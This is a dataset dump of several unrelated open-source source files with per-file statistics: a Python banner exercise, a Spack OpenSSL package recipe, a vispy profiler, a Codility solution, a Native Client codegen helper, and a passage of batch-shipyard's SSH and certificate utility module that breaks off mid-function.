| 21.5 | 54 | 0.413621 | 78 | 602 | 3.089744 | 0.410256 | 0.165975 | 0.124481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039394 | 0.451827 | 602 | 28 | 55 | 21.5 | 0.690909 | 0 | 0 | 0.208333 | 0 | 0 | 0.013267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.083333 | 0 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0aaa92e8b56443a2b167621484f9881042d7391b
| 983 |
py
|
Python
|
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
ProgramFlow/functions/banner.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
def banner_text(text):
screen_width = 80
if len(text) > screen_width - 4:
print("EEK!!")
print("THE TEXT IS TOO LONG TO FIT IN THE SPECIFIED WIDTH")
if text == "*":
print("*" * screen_width)
else:
centred_text = text.center(screen_width - 4)
output_string = "**{0}**".format(centred_text)
print(output_string)
banner_text("*")
banner_text("Always look on the bright side of life...")
banner_text("If life seems jolly rotten,")
banner_text("There's something you've forgotten!")
banner_text("And that's to laugh and smile and dance and sing,")
banner_text(" ")
banner_text("When you're feeling in the dumps,")
banner_text("Don't be silly chumps,")
banner_text("Just purse your lips and whistle - that's the thing!")
banner_text("And... always look on the bright side of life...")
banner_text("*")
result = banner_text("Nothing is returned")
print(result)
numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
print(numbers.sort())
| 30.71875 | 67 | 0.66531 | 153 | 983 | 4.137255 | 0.496732 | 0.205371 | 0.047393 | 0.063191 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0.129542 | 0 | 0.017588 | 0.190234 | 983 | 31 | 68 | 31.709677 | 0.777638 | 0 | 0 | 0.076923 | 0 | 0 | 0.399797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0 | 0 | 0.038462 | 0.230769 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ab878278314d67f6d0be9f6568f133ce9e1ee76
| 8,119 |
py
|
Python
|
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 |
2021-01-11T09:16:43.000Z
|
2021-01-12T20:07:23.000Z
|
var/spack/repos/builtin/packages/openssl/package.py
|
vitodb/spack
|
b9ab1de4c5f7b21d9f9cb88b7251820a48e82d27
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 |
2021-01-06T18:58:26.000Z
|
2021-01-06T18:58:26.000Z
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import llnl.util.tty as tty
from spack import *
import spack.architecture
import os
class Openssl(Package): # Uses Fake Autotools, should subclass Package
"""OpenSSL is an open source project that provides a robust,
commercial-grade, and full-featured toolkit for the Transport
Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
It is also a general-purpose cryptography library."""
homepage = "http://www.openssl.org"
# URL must remain http:// so Spack can bootstrap curl
url = "http://www.openssl.org/source/openssl-1.1.1d.tar.gz"
list_url = "http://www.openssl.org/source/old/"
list_depth = 1
# The latest stable version is the 1.1.1 series. This is also our Long Term
# Support (LTS) version, supported until 11th September 2023.
version('1.1.1g', sha256='ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46')
version('1.1.1f', sha256='186c6bfe6ecfba7a5b48c47f8a1673d0f3b0e5ba2e25602dd23b629975da3f35')
version('1.1.1e', sha256='694f61ac11cb51c9bf73f54e771ff6022b0327a43bbdfa1b2f19de1662a6dcbe')
version('1.1.1d', sha256='1e3a91bc1f9dfce01af26026f856e064eab4c8ee0a8f457b5ae30b40b8b711f2')
version('1.1.1c', sha256='f6fb3079ad15076154eda9413fed42877d668e7069d9b87396d0804fdb3f4c90')
version('1.1.1b', sha256='5c557b023230413dfb0756f3137a13e6d726838ccd1430888ad15bfb2b43ea4b')
version('1.1.1a', sha256='fc20130f8b7cbd2fb918b2f14e2f429e109c31ddd0fb38fc5d71d9ffed3f9f41')
version('1.1.1', sha256='2836875a0f89c03d0fdf483941512613a50cfb421d6fd94b9f41d7279d586a3d')
# The 1.1.0 series is out of support and should not be used.
version('1.1.0l', sha256='74a2f756c64fd7386a29184dc0344f4831192d61dc2481a93a4c5dd727f41148')
version('1.1.0k', sha256='efa4965f4f773574d6cbda1cf874dbbe455ab1c0d4f906115f867d30444470b1')
version('1.1.0j', sha256='31bec6c203ce1a8e93d5994f4ed304c63ccf07676118b6634edded12ad1b3246')
version('1.1.0i', sha256='ebbfc844a8c8cc0ea5dc10b86c9ce97f401837f3fa08c17b2cdadc118253cf99')
version('1.1.0g', sha256='de4d501267da39310905cb6dc8c6121f7a2cad45a7707f76df828fe1b85073af')
version('1.1.0e', sha256='57be8618979d80c910728cfc99369bf97b2a1abd8f366ab6ebdee8975ad3874c')
version('1.1.0d', sha256='7d5ebb9e89756545c156ff9c13cf2aa6214193b010a468a3bc789c3c28fe60df')
version('1.1.0c', sha256='fc436441a2e05752d31b4e46115eb89709a28aef96d4fe786abe92409b2fd6f5')
# The 1.0.2 series is out of support and should not be used.
version('1.0.2u', sha256='ecd0c6ffb493dd06707d38b14bb4d8c2288bb7033735606569d8f90f89669d16')
version('1.0.2t', sha256='14cb464efe7ac6b54799b34456bd69558a749a4931ecfd9cf9f71d7881cac7bc')
version('1.0.2s', sha256='cabd5c9492825ce5bd23f3c3aeed6a97f8142f606d893df216411f07d1abab96')
version('1.0.2r', sha256='ae51d08bba8a83958e894946f15303ff894d75c2b8bbd44a852b64e3fe11d0d6')
version('1.0.2p', sha256='50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00')
version('1.0.2o', sha256='ec3f5c9714ba0fd45cb4e087301eb1336c317e0d20b575a125050470e8089e4d')
version('1.0.2n', sha256='370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe')
version('1.0.2m', sha256='8c6ff15ec6b319b50788f42c7abc2890c08ba5a1cdcd3810eb9092deada37b0f')
version('1.0.2k', sha256='6b3977c61f2aedf0f96367dcfb5c6e578cf37e7b8d913b4ecb6643c3cb88d8c0')
version('1.0.2j', sha256='e7aff292be21c259c6af26469c7a9b3ba26e9abaaffd325e3dccc9785256c431')
version('1.0.2i', sha256='9287487d11c9545b6efb287cdb70535d4e9b284dd10d51441d9b9963d000de6f')
version('1.0.2h', sha256='1d4007e53aad94a5b2002fe045ee7bb0b3d98f1a47f8b2bc851dcd1c74332919')
version('1.0.2g', sha256='b784b1b3907ce39abf4098702dade6365522a253ad1552e267a9a0e89594aa33')
version('1.0.2f', sha256='932b4ee4def2b434f85435d9e3e19ca8ba99ce9a065a61524b429a9d5e9b2e9c')
version('1.0.2e', sha256='e23ccafdb75cfcde782da0151731aa2185195ac745eea3846133f2e05c0e0bff')
version('1.0.2d', sha256='671c36487785628a703374c652ad2cebea45fa920ae5681515df25d9f2c9a8c8')
# The 1.0.1 version is out of support and should not be used.
version('1.0.1u', sha256='4312b4ca1215b6f2c97007503d80db80d5157f76f8f7d3febbe6b4c56ff26739')
version('1.0.1t', sha256='4a6ee491a2fdb22e519c76fdc2a628bb3cec12762cd456861d207996c8a07088')
version('1.0.1r', sha256='784bd8d355ed01ce98b812f873f8b2313da61df7c7b5677fcf2e57b0863a3346')
version('1.0.1h', sha256='9d1c8a9836aa63e2c6adb684186cbd4371c9e9dcc01d6e3bb447abf2d4d3d093')
version('1.0.1e', sha256='f74f15e8c8ff11aa3d5bb5f276d202ec18d7246e95f961db76054199c69c1ae3')
variant('systemcerts', default=True, description='Use system certificates')
depends_on('zlib')
depends_on('perl@5.14.0:', type=('build', 'test'))
parallel = False
@property
def libs(self):
return find_libraries(['libssl', 'libcrypto'], root=self.prefix.lib)
def handle_fetch_error(self, error):
tty.warn("Fetching OpenSSL failed. This may indicate that OpenSSL has "
"been updated, and the version in your instance of Spack is "
"insecure. Consider updating to the latest OpenSSL version.")
def install(self, spec, prefix):
# OpenSSL uses a variable APPS in its Makefile. If it happens to be set
# in the environment, then this will override what is set in the
# Makefile, leading to build errors.
env.pop('APPS', None)
if str(spec.target.family) in ('x86_64', 'ppc64'):
# This needs to be done for all 64-bit architectures (except Linux,
# where it happens automatically?)
env['KERNEL_BITS'] = '64'
options = ['zlib', 'shared']
if spec.satisfies('@1.0'):
options.append('no-krb5')
# clang does not support the .arch directive in assembly files.
if 'clang' in self.compiler.cc and \
'aarch64' in spack.architecture.sys_type():
options.append('no-asm')
config = Executable('./config')
config('--prefix=%s' % prefix,
'--openssldir=%s' % join_path(prefix, 'etc', 'openssl'),
'-I{0}'.format(self.spec['zlib'].prefix.include),
'-L{0}'.format(self.spec['zlib'].prefix.lib),
*options)
# Remove non-standard compiler options if present. These options are
# present e.g. on Darwin. They are non-standard, i.e. most compilers
# (e.g. gcc) will not accept them.
filter_file(r'-arch x86_64', '', 'Makefile')
make()
if self.run_tests:
make('test') # 'VERBOSE=1'
make('install')
@run_after('install')
def link_system_certs(self):
if '+systemcerts' not in self.spec:
return
system_dirs = [
# CentOS, Fedora, RHEL
'/etc/pki/tls',
# Ubuntu
'/usr/lib/ssl',
# OpenSUSE
'/etc/ssl'
]
pkg_dir = join_path(self.prefix, 'etc', 'openssl')
for directory in system_dirs:
sys_cert = join_path(directory, 'cert.pem')
pkg_cert = join_path(pkg_dir, 'cert.pem')
# If a bundle exists, use it. This is the preferred way on Fedora,
# where the certs directory does not work.
if os.path.exists(sys_cert) and not os.path.exists(pkg_cert):
os.symlink(sys_cert, pkg_cert)
sys_certs = join_path(directory, 'certs')
pkg_certs = join_path(pkg_dir, 'certs')
# If the certs directory exists, symlink it into the package.
# We symlink the whole directory instead of all files because
# the directory contents might change without Spack noticing.
if os.path.isdir(sys_certs) and not os.path.islink(pkg_certs):
os.rmdir(pkg_certs)
os.symlink(sys_certs, pkg_certs)
| 51.713376 | 96 | 0.711787 | 832 | 8,119 | 6.897837 | 0.419471 | 0.051577 | 0.032933 | 0.008887 | 0.041122 | 0.041122 | 0.023349 | 0.023349 | 0.023349 | 0.023349 | 0 | 0.263539 | 0.18352 | 8,119 | 156 | 97 | 52.044872 | 0.602202 | 0.204828 | 0 | 0 | 0 | 0.010204 | 0.498985 | 0.369942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.040816 | 0.010204 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ab9be78769ca53a9456cd93a3fd3ab2a85a0c35
| 4,799 |
py
|
Python
|
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
"""Simple profiler allowing directed, hierarchical measurement of time
intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `VISPYPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `VISPYPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "vispy.." prefix from the module.
"""
_profilers = (config['profile'].split(",") if config['profile'] is not None
else [])
_depth = 0
_msgs = []
# set this flag to disable all or individual profilers at runtime
disable = False
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabled_profiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if (disabled is True or
(disabled == 'env' and len(cls._profilers) == 0)):
return cls._disabled_profiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if (disabled == 'env' and func_qualname not in cls._profilers and
'all' not in cls._profilers): # don't do anything
return cls._disabled_profiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._mark_count = 0
obj._finished = False
obj._firstTime = obj._last_time = ptime.time()
obj._new_msg("> Entering " + obj._name)
return obj
def __call__(self, msg=None, *args):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._mark_count)
self._mark_count += 1
new_time = ptime.time()
elapsed = (new_time - self._last_time) * 1000
self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
self._last_time = new_time
def mark(self, msg=None):
self(msg)
def _new_msg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._new_msg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0] % m[1] for m in self._msgs]))
type(self)._msgs = []
| 34.52518 | 79 | 0.583663 | 587 | 4,799 | 4.599659 | 0.337308 | 0.018148 | 0.016296 | 0.013333 | 0.028889 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0092 | 0.320483 | 4,799 | 138 | 80 | 34.775362 | 0.818767 | 0.356324 | 0 | 0.202532 | 0 | 0 | 0.034343 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139241 | false | 0.050633 | 0.037975 | 0 | 0.329114 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0abcc62b08fba05c95b291d22e16bd5e45062b59
| 204 |
py
|
Python
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 61 |
2020-09-26T19:57:44.000Z
|
2022-03-09T18:51:44.000Z
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 88 |
2020-09-19T20:00:27.000Z
|
2021-10-31T09:41:57.000Z
|
Codility/python/tape_equilibrium.py
|
ajeet1308/code_problems
|
5d99839b6319295c6d81dd86775c46a536e7a1ca
|
[
"MIT"
] | 218 |
2020-09-20T08:18:03.000Z
|
2022-01-30T23:13:16.000Z
|
def solution(A):
total = sum(A)
m = float('inf')
left_sum = 0
for n in A[:-1]:
left_sum += n
v = abs(total - 2*left_sum)
if v < m:
m = v
return m
| 15.692308 | 35 | 0.426471 | 33 | 204 | 2.545455 | 0.575758 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.441176 | 204 | 12 | 36 | 17 | 0.710526 | 0 | 0 | 0 | 0 | 0 | 0.014778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ac3e100821a287c22e2857e9d532f5d8e059c8b
| 2,723 |
py
|
Python
|
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | 1 |
2021-12-23T00:36:43.000Z
|
2021-12-23T00:36:43.000Z
|
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | null | null | null |
src/trusted/validator_arm/dgen_output.py
|
kapkic/native_client
|
51c8bc8c249d55606232ae011bdfc8b4cab3d794
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python2
#
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
"""
Some common boilerplates and helper functions for source code generation
in files dgen_test_output.py and dgen_decode_output.py.
"""
HEADER_BOILERPLATE ="""/*
* Copyright 2013 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can
* be found in the LICENSE file.
*/
// DO NOT EDIT: GENERATED CODE
"""
NOT_TCB_BOILERPLATE="""#ifndef NACL_TRUSTED_BUT_NOT_TCB
#error This file is not meant for use in the TCB
#endif
"""
NEWLINE_STR="""
"""
COMMENTED_NEWLINE_STR="""
//"""
"""Adds comment '// ' string after newlines."""
def commented_string(str, indent=''):
sep = NEWLINE_STR + indent + '//'
str = str.replace(NEWLINE_STR, sep)
# This second line is a hack to fix that sometimes newlines are
# represented as '\n'.
# TODO(karl) Find the cause of this hack, and fix it.
return str.replace('\\n', sep)
def ifdef_name(filename):
""" Generates the ifdef name to use for the given filename"""
return filename.replace("/", "_").replace(".", "_").upper() + "_"
def GetNumberCodeBlocks(separators):
"""Gets the number of code blocks to break classes into."""
num_blocks = len(separators) + 1
assert num_blocks >= 2
return num_blocks
def FindBlockIndex(filename, format, num_blocks):
"""Returns true if the filename matches the format with an
index in the range [1, num_blocks]."""
for block in range(1, num_blocks+1):
suffix = format % block
if filename.endswith(suffix):
return block
raise Exception("Can't find block index: %s" % filename)
def GetDecodersBlock(n, separators, decoders, name_fcn):
"""Returns the (sorted) list of decoders to include
in block n, assuming decoders are split using
the list of separators."""
num_blocks = GetNumberCodeBlocks(separators)
assert n > 0 and n <= num_blocks
return [decoder for decoder in decoders
if ((n == 1
or IsPrefixLeDecoder(separators[n-2], decoder, name_fcn)) and
(n == num_blocks or
not IsPrefixLeDecoder(separators[n-1], decoder, name_fcn)))]
def IsPrefixLeDecoder(prefix, decoder, name_fcn):
"""Returns true if the prefix is less than or equal to the
corresponding prefix length of the decoder name."""
decoder_name = name_fcn(decoder)
prefix_len = len(prefix)
decoder_len = len(decoder_name)
decoder_prefix = (decoder_name[0:prefix_len]
if prefix_len < decoder_len
else decoder_name)
return prefix <= decoder_prefix
| 31.298851 | 76 | 0.693353 | 386 | 2,723 | 4.772021 | 0.373057 | 0.043974 | 0.022801 | 0.023887 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0 | 0.008756 | 0.203085 | 2,723 | 86 | 77 | 31.662791 | 0.840092 | 0.319868 | 0 | 0.06383 | 0 | 0 | 0.194604 | 0.013777 | 0 | 0 | 0 | 0.011628 | 0.042553 | 1 | 0.12766 | false | 0 | 0 | 0 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ac98e5cdb6676a542021f48c116aa5fa733e705
| 16,208 |
py
|
Python
|
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
PfxSettings = collections.namedtuple(
'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
# type: (None) -> str
"""Get SSH key prefix
:rtype: str
:return: ssh key prefix
"""
return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
# type: (None) -> str
"""Get remote fs SSH key prefix
:rtype: str
:return: ssh key prefix for remote fs
"""
return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
# type: (None) -> str
"""Generate an RDP password
:rtype: str
:return: rdp password
"""
return base64.b64encode(os.urandom(8))
def generate_ssh_keypair(export_path, prefix=None):
# type: (str, str) -> tuple
"""Generate an ssh keypair for use with user logins
:param str export_path: keypair export path
:param str prefix: key prefix
:rtype: tuple
:return: (private key filename, public key filename)
"""
if util.is_none_or_empty(prefix):
prefix = _SSH_KEY_PREFIX
privkey = pathlib.Path(export_path, prefix)
pubkey = pathlib.Path(export_path, prefix + '.pub')
if privkey.exists():
old = pathlib.Path(export_path, prefix + '.old')
if old.exists():
old.unlink()
privkey.rename(old)
if pubkey.exists():
old = pathlib.Path(export_path, prefix + '.pub.old')
if old.exists():
old.unlink()
pubkey.rename(old)
logger.info('generating ssh key pair to path: {}'.format(export_path))
subprocess.check_call(
['ssh-keygen', '-f', str(privkey), '-t', 'rsa', '-N', ''''''])
return (privkey, pubkey)
def check_ssh_private_key_filemode(ssh_private_key):
# type: (pathlib.Path) -> bool
"""Check SSH private key filemode
:param pathlib.Path ssh_private_key: SSH private key
:rtype: bool
:return: private key filemode is ok
"""
def _mode_check(fstat, flag):
return bool(fstat & flag)
if util.on_windows():
return True
fstat = ssh_private_key.stat().st_mode
modes = frozenset((stat.S_IRWXG, stat.S_IRWXO))
return not any([_mode_check(fstat, x) for x in modes])
def connect_or_exec_ssh_command(
remote_ip, remote_port, ssh_private_key, username, sync=True,
shell=False, tty=False, ssh_args=None, command=None):
# type: (str, int, pathlib.Path, str, bool, bool, tuple, tuple) -> bool
"""Connect to node via SSH or execute SSH command
:param str remote_ip: remote ip address
:param int remote_port: remote port
:param pathlib.Path ssh_private_key: SSH private key
:param str username: username
:param bool sync: synchronous execution
:param bool shell: execute with shell
:param bool tty: allocate pseudo-tty
:param tuple ssh_args: ssh args
:param tuple command: command
:rtype: int or subprocess.Process
:return: return code or subprocess handle
"""
if not ssh_private_key.exists():
raise RuntimeError('SSH private key file not found at: {}'.format(
ssh_private_key))
# ensure file mode is set properly for the private key
if not check_ssh_private_key_filemode(ssh_private_key):
logger.warning(
'SSH private key filemode is too permissive: {}'.format(
ssh_private_key))
# execute SSH command
ssh_cmd = [
'ssh', '-o', 'StrictHostKeyChecking=no',
'-o', 'UserKnownHostsFile={}'.format(os.devnull),
'-i', str(ssh_private_key), '-p', str(remote_port),
]
if tty:
ssh_cmd.append('-t')
if util.is_not_empty(ssh_args):
ssh_cmd.extend(ssh_args)
ssh_cmd.append('{}@{}'.format(username, remote_ip))
if util.is_not_empty(command):
ssh_cmd.extend(command)
logger.info('{} node {}:{} with key {}'.format(
'connecting to' if util.is_none_or_empty(command)
else 'executing command on', remote_ip, remote_port, ssh_private_key))
if sync:
return util.subprocess_with_output(ssh_cmd, shell=shell)
else:
return util.subprocess_nowait_pipe_stdout(
ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a private key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a public key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def _parse_sha1_thumbprint_openssl(output):
# type: (str) -> str
"""Get SHA1 thumbprint from buffer
:param str buffer: buffer to parse
:rtype: str
:return: sha1 thumbprint of buffer
"""
# return just thumbprint (without colons) from the above openssl command
# in lowercase. Expected openssl output is in the form:
# SHA1 Fingerprint=<thumbprint>
return ''.join(util.decode_string(
output).strip().split('=')[1].split(':')).lower()
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
# type: (str, str) -> str
"""Get SHA1 thumbprint of PFX
:param str pfxfile: name of the pfx file to export
:param str passphrase: passphrase for pfx
:rtype: str
:return: sha1 thumbprint of pfx
"""
if pfxfile is None:
raise ValueError('pfxfile is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
